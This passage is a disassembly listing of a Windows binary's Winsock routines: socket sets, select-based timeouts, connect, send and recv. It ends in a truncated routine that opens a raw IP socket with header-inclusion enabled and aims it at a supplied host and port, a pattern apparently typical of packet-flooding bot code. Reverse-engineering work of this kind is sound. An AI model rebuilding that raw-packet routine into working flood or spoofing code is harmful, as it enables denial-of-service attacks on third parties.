mov ecx, [ebp+arg_4]
mov eax, [eax+4]
cmp eax, [ecx]
jnz short loc_404D6A
push [ebp+arg_0]
call sub_4053B1
pop ecx
xor eax, eax
jmp short loc_404D99
; ---------------------------------------------------------------------------
loc_404D6A: ; CODE XREF: sub_404D4D+E�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ecx+eax*4+0Ch], edx
mov eax, [ebp+arg_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
xor edx, edx
cmp eax, [ecx]
setnz dl
mov eax, edx
loc_404D99: ; CODE XREF: sub_404D4D+1B�j
pop ebp
retn
sub_404D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D9B proc near ; CODE XREF: sub_41349C+512�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404DAC
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404D9B:loc_404E18�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404DAC: ; CODE XREF: sub_404D9B+8�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short locret_404E1A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4+0Ch]
cmp eax, [ebp+arg_0]
jnz short loc_404E18
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+8]
jb short loc_404DDE
mov eax, [ebp+arg_4]
mov eax, [eax+8]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
loc_404DDE: ; CODE XREF: sub_404D9B+34�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
sub eax, [ebp+var_4]
shl eax, 2
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+10h]
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+0Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_4]
mov eax, [eax+4]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
jmp short locret_404E1A
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404D9B+29�j
jmp short loc_404DA5
; ---------------------------------------------------------------------------
locret_404E1A: ; CODE XREF: sub_404D9B+1A�j
; sub_404D9B+7B�j
leave
retn
sub_404D9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E1C proc near ; CODE XREF: sub_41349C+45F�p
; sub_4143B0+14E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
and [ebp+var_8], 0
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E3A: ; CODE XREF: sub_404E1C+BD�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_404E41: ; CODE XREF: sub_404E1C+1C�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+4]
jnb loc_404EDE
loc_404E50: ; CODE XREF: sub_404E1C+B7�j
and [ebp+var_14], 0
jmp short loc_404E5D
; ---------------------------------------------------------------------------
loc_404E56: ; CODE XREF: sub_404E1C:loc_404E86�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_404E5D: ; CODE XREF: sub_404E1C+38�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnb short loc_404E88
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+810h]
cmp eax, [esi+edx*4+0Ch]
jnz short loc_404E86
jmp short loc_404E88
; ---------------------------------------------------------------------------
loc_404E86: ; CODE XREF: sub_404E1C+66�j
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E88: ; CODE XREF: sub_404E1C+4D�j
; sub_404E1C+68�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnz short loc_404ECF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+80Ch], 200h
jnb short loc_404ECF
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+0Ch]
mov [ecx+eax*4+810h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+80Ch]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+80Ch], eax
loc_404ECF: ; CODE XREF: sub_404E1C+78�j
; sub_404E1C+87�j
xor eax, eax
test eax, eax
jnz loc_404E50
jmp loc_404E3A
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E1C+2E�j
and [ebp+var_10], 0
mov [ebp+var_C], 3E8h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
push 0
push 0
call dword_41722C ; select
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404F1A
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404F1A
mov [ebp+var_18], 1
jmp short loc_404F1E
; ---------------------------------------------------------------------------
loc_404F1A: ; CODE XREF: sub_404E1C+ED�j
; sub_404E1C+F3�j
and [ebp+var_18], 0
loc_404F1E: ; CODE XREF: sub_404E1C+FC�j
mov eax, [ebp+var_18]
pop esi
leave
retn
sub_404E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; CODE XREF: sub_41349C+470�p
; sub_4143B0+16D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_404F3A
; ---------------------------------------------------------------------------
loc_404F33: ; CODE XREF: sub_404F24:loc_404F77�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F3A: ; CODE XREF: sub_404F24+D�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404F79
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_404F77
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4+0Ch]
jmp short locret_404F7B
; ---------------------------------------------------------------------------
loc_404F77: ; CODE XREF: sub_404F24+3B�j
jmp short loc_404F33
; ---------------------------------------------------------------------------
loc_404F79: ; CODE XREF: sub_404F24+1F�j
xor eax, eax
locret_404F7B: ; CODE XREF: sub_404F24+51�j
leave
retn
sub_404F24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F7D proc near ; CODE XREF: sub_404FD0+6�p
; sub_41349C+59C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404F8E
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404F7D+37�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F8E: ; CODE XREF: sub_404F7D+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404FB6
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_4053B1
pop ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and dword ptr [ecx+eax*4+0Ch], 0
jmp short loc_404F87
; ---------------------------------------------------------------------------
loc_404FB6: ; CODE XREF: sub_404F7D+1A�j
mov eax, [ebp+arg_0]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
leave
retn
sub_404F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FD0 proc near ; CODE XREF: sub_41349C+5FB�p
; sub_4143B0+238�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_404F7D
pop ecx
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_404FD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_412BC9+11�p
; sub_41349C+40E�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_405010
mov [ebp+var_20], 17h
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405010: ; CODE XREF: sub_404FE7+1E�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405023
mov [ebp+var_20], 2
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405023: ; CODE XREF: sub_404FE7+31�j
and [ebp+var_20], 0
loc_405027: ; CODE XREF: sub_404FE7+27�j
; sub_404FE7+3A�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE54 ; getaddrinfo
test eax, eax
jz short loc_405057
xor eax, eax
jmp locret_4050E8
; ---------------------------------------------------------------------------
loc_405057: ; CODE XREF: sub_404FE7+67�j
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_40505F: ; CODE XREF: sub_404FE7+A8�j
; sub_404FE7+F4�j
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_405068: ; CODE XREF: sub_404FE7+76�j
cmp [ebp+var_4], 0
jz short loc_4050DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_405091
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_404FE7+A6�j
push 0
push [ebp+var_2C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_2C]
call dword_4171F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050D2
call dword_417224 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4050D2
push [ebp+var_28]
call dword_41DE5C ; freeaddrinfo
mov eax, [ebp+var_2C]
jmp short locret_4050E8
; ---------------------------------------------------------------------------
loc_4050D2: ; CODE XREF: sub_404FE7+CE�j
; sub_404FE7+DB�j
push [ebp+var_2C]
call sub_4053B1
pop ecx
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_4050DD: ; CODE XREF: sub_404FE7+85�j
push [ebp+var_28]
call dword_41DE5C ; freeaddrinfo
xor eax, eax
locret_4050E8: ; CODE XREF: sub_404FE7+6B�j
; sub_404FE7+E9�j
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050EA proc near ; CODE XREF: sub_401E38+80�p
; sub_402698+16�p ...
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 844h
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
mov [ebp+var_834], eax
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
imul edx, 3E8h
mov [ebp+var_830], edx
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_40513E
mov [ebp+var_20], 17h
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_40513E: ; CODE XREF: sub_4050EA+49�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405151
mov [ebp+var_20], 2
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_405151: ; CODE XREF: sub_4050EA+5C�j
and [ebp+var_20], 0
loc_405155: ; CODE XREF: sub_4050EA+52�j
; sub_4050EA+65�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_82C]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE54 ; getaddrinfo
test eax, eax
jz short loc_405188
xor eax, eax
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_405188: ; CODE XREF: sub_4050EA+95�j
mov eax, [ebp+var_82C]
mov [ebp+var_4], eax
jmp short loc_40519C
; ---------------------------------------------------------------------------
loc_405193: ; CODE XREF: sub_4050EA+E3�j
; sub_4050EA+128�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40519C: ; CODE XREF: sub_4050EA+A7�j
cmp [ebp+var_4], 0
jz loc_40537D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_83C], eax
cmp [ebp+var_83C], 0FFFFFFFFh
jnz short loc_4051CF
jmp short loc_405193
; ---------------------------------------------------------------------------
loc_4051CF: ; CODE XREF: sub_4050EA+E1�j
push 0
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_83C]
call dword_4171F4 ; connect
mov [ebp+var_838], eax
cmp [ebp+var_838], 0
jz short loc_405217
call dword_417224 ; WSAGetLastError
cmp eax, 2733h
jz short loc_405217
jmp loc_405193
; ---------------------------------------------------------------------------
loc_405217: ; CODE XREF: sub_4050EA+119�j
; sub_4050EA+126�j
and [ebp+var_828], 0
loc_40521E: ; CODE XREF: sub_4050EA+1AF�j
and [ebp+var_840], 0
jmp short loc_405234
; ---------------------------------------------------------------------------
loc_405227: ; CODE XREF: sub_4050EA:loc_405259�j
mov eax, [ebp+var_840]
inc eax
mov [ebp+var_840], eax
loc_405234: ; CODE XREF: sub_4050EA+13B�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnb short loc_40525B
mov eax, [ebp+var_840]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405259
jmp short loc_40525B
; ---------------------------------------------------------------------------
loc_405259: ; CODE XREF: sub_4050EA+16B�j
jmp short loc_405227
; ---------------------------------------------------------------------------
loc_40525B: ; CODE XREF: sub_4050EA+156�j
; sub_4050EA+16D�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnz short loc_405295
cmp [ebp+var_828], 200h
jnb short loc_405295
mov eax, [ebp+var_840]
mov ecx, [ebp+var_83C]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_828]
inc eax
mov [ebp+var_828], eax
loc_405295: ; CODE XREF: sub_4050EA+17D�j
; sub_4050EA+189�j
xor eax, eax
test eax, eax
jnz short loc_40521E
lea eax, [ebp+var_834]
push eax
push 0
lea eax, [ebp+var_828]
push eax
push 0
push 0
call dword_41722C ; select
cmp eax, 1
jnz short loc_4052E0
push 1
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
push [ebp+var_82C]
call dword_41DE5C ; freeaddrinfo
mov eax, [ebp+var_83C]
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4050EA+1CE�j
; sub_4050EA+27C�j
and [ebp+var_844], 0
jmp short loc_4052F6
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: sub_4050EA:loc_405360�j
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
loc_4052F6: ; CODE XREF: sub_4050EA+1FD�j
mov eax, [ebp+var_844]
cmp eax, [ebp+var_828]
jnb short loc_405362
mov eax, [ebp+var_844]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405360
loc_405319: ; CODE XREF: sub_4050EA+265�j
mov eax, [ebp+var_828]
dec eax
cmp [ebp+var_844], eax
jnb short loc_405351
mov eax, [ebp+var_844]
mov ecx, [ebp+var_844]
mov ecx, [ebp+ecx*4+var_820]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
jmp short loc_405319
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: sub_4050EA+23C�j
mov eax, [ebp+var_828]
dec eax
mov [ebp+var_828], eax
jmp short loc_405362
; ---------------------------------------------------------------------------
loc_405360: ; CODE XREF: sub_4050EA+22D�j
jmp short loc_4052E9
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: sub_4050EA+218�j
; sub_4050EA+274�j
xor eax, eax
test eax, eax
jnz loc_4052E0
push [ebp+var_83C]
call sub_4053B1
pop ecx
jmp loc_405193
; ---------------------------------------------------------------------------
loc_40537D: ; CODE XREF: sub_4050EA+B6�j
push [ebp+var_82C]
call dword_41DE5C ; freeaddrinfo
xor eax, eax
locret_40538B: ; CODE XREF: sub_4050EA+99�j
; sub_4050EA+1F1�j
leave
retn
sub_4050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538D proc near ; CODE XREF: sub_401E38+26E�p
; sub_4020C2+3FB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+arg_0]
call sub_4053B1
pop ecx
pop ebp
retn
sub_40538D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B1 proc near ; CODE XREF: sub_404279+77�p
; sub_40432E+1C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_417230 ; closesocket
pop ebp
retn
sub_4053B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: sub_401E38+15C�p
; sub_4020C2+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41720C ; send
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4053BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053DC proc near ; CODE XREF: sub_403DF3+D1�p
; sub_405443+21�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 2
jnb short loc_4053F6
push 271Eh
call dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_4053F6: ; CODE XREF: sub_4053DC+8�j
push 0
mov eax, [ebp+arg_8]
dec eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_417248 ; recv
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_405418
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40541D
loc_405418: ; CODE XREF: sub_4053DC+34�j
mov eax, [ebp+var_4]
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: sub_4053DC+3A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jb short loc_405435
push 271Eh
call dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_405435: ; CODE XREF: sub_4053DC+47�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
locret_405441: ; CODE XREF: sub_4053DC+18�j
; sub_4053DC+3F�j ...
leave
retn
sub_4053DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405443 proc near ; CODE XREF: sub_402698+8D�p
; sub_402698+2BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_40545B
xor eax, eax
jmp short loc_40546C
; ---------------------------------------------------------------------------
loc_40545B: ; CODE XREF: sub_405443+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
loc_40546C: ; CODE XREF: sub_405443+16�j
pop ebp
retn
sub_405443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40546E proc near ; CODE XREF: sub_405443+9�p
; sub_410649+2D�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_416BC0
and [ebp+var_804], 0
and [ebp+var_1008], 0
loc_405489: ; CODE XREF: sub_40546E+90�j
and [ebp+var_1014], 0
jmp short loc_40549F
; ---------------------------------------------------------------------------
loc_405492: ; CODE XREF: sub_40546E:loc_4054C1�j
mov eax, [ebp+var_1014]
inc eax
mov [ebp+var_1014], eax
loc_40549F: ; CODE XREF: sub_40546E+22�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnb short loc_4054C3
mov eax, [ebp+var_1014]
mov eax, [ebp+eax*4+var_800]
cmp eax, [ebp+arg_0]
jnz short loc_4054C1
jmp short loc_4054C3
; ---------------------------------------------------------------------------
loc_4054C1: ; CODE XREF: sub_40546E+4F�j
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054C3: ; CODE XREF: sub_40546E+3D�j
; sub_40546E+51�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnz short loc_4054FA
cmp [ebp+var_804], 200h
jnb short loc_4054FA
mov eax, [ebp+var_1014]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_800], ecx
mov eax, [ebp+var_804]
inc eax
mov [ebp+var_804], eax
loc_4054FA: ; CODE XREF: sub_40546E+61�j
; sub_40546E+6D�j
xor eax, eax
test eax, eax
jnz short loc_405489
loc_405500: ; CODE XREF: sub_40546E+107�j
and [ebp+var_1018], 0
jmp short loc_405516
; ---------------------------------------------------------------------------
loc_405509: ; CODE XREF: sub_40546E:loc_405538�j
mov eax, [ebp+var_1018]
inc eax
mov [ebp+var_1018], eax
loc_405516: ; CODE XREF: sub_40546E+99�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnb short loc_40553A
mov eax, [ebp+var_1018]
mov eax, [ebp+eax*4+var_1004]
cmp eax, [ebp+arg_0]
jnz short loc_405538
jmp short loc_40553A
; ---------------------------------------------------------------------------
loc_405538: ; CODE XREF: sub_40546E+C6�j
jmp short loc_405509
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40546E+B4�j
; sub_40546E+C8�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnz short loc_405571
cmp [ebp+var_1008], 200h
jnb short loc_405571
mov eax, [ebp+var_1018]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_1004], ecx
mov eax, [ebp+var_1008]
inc eax
mov [ebp+var_1008], eax
loc_405571: ; CODE XREF: sub_40546E+D8�j
; sub_40546E+E4�j
xor eax, eax
test eax, eax
jnz short loc_405500
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1010], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_100C], edx
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_1008]
push eax
push 0
lea eax, [ebp+var_804]
push eax
push 1
call dword_41722C ; select
cmp eax, 1
jz short loc_4055C9
xor eax, eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055C9: ; CODE XREF: sub_40546E+155�j
lea eax, [ebp+var_804]
push eax
push [ebp+arg_0]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_4055E1
push 1
pop eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055E1: ; CODE XREF: sub_40546E+16C�j
xor eax, eax
locret_4055E3: ; CODE XREF: sub_40546E+159�j
; sub_40546E+171�j
leave
retn
sub_40546E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055E5 proc near ; DATA XREF: sub_405E45+113�o
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = dword ptr -1344h
var_1340 = dword ptr -1340h
var_133C = dword ptr -133Ch
var_1338 = dword ptr -1338h
var_1334 = dword ptr -1334h
var_118D = byte ptr -118Dh
var_108D = byte ptr -108Dh
var_1087 = dword ptr -1087h
var_1083 = dword ptr -1083h
var_107F = dword ptr -107Fh
var_1078 = dword ptr -1078h
var_1074 = byte ptr -1074h
var_1058 = byte ptr -1058h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1358h
call sub_416BC0
push 2B9h
push [ebp+arg_0]
lea eax, [ebp+var_1334]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0FFh
push 3
push 2
call dword_417218 ; socket
mov [ebp+var_1078], eax
cmp [ebp+var_1078], 0FFFFFFFFh
jnz short loc_405643
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405643: ; CODE XREF: sub_4055E5+49�j
mov [ebp+var_1340], 1
push 4
lea eax, [ebp+var_1340]
push eax
push 2
push 0
push [ebp+var_1078]
call dword_417204 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40567E
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_40567E: ; CODE XREF: sub_4055E5+84�j
push 0
push [ebp+var_1078]
call sub_404457
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
lea eax, [ebp+var_108D]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_118D]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp+var_118D]
push eax
call dword_41723C ; gethostbyname
mov [ebp+var_1344], eax
cmp [ebp+var_1344], 0
jnz short loc_405700
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: sub_4055E5+106�j
mov eax, [ebp+var_1344]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
loc_405710: ; CODE XREF: sub_4055E5+EA�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405729
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: sub_4055E5+12F�j
push 1060h
push 0
lea eax, [ebp+var_1074]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp+var_1074]
mov [ebp+var_133C], eax
lea eax, [ebp+var_1058]
mov [ebp+var_14], eax
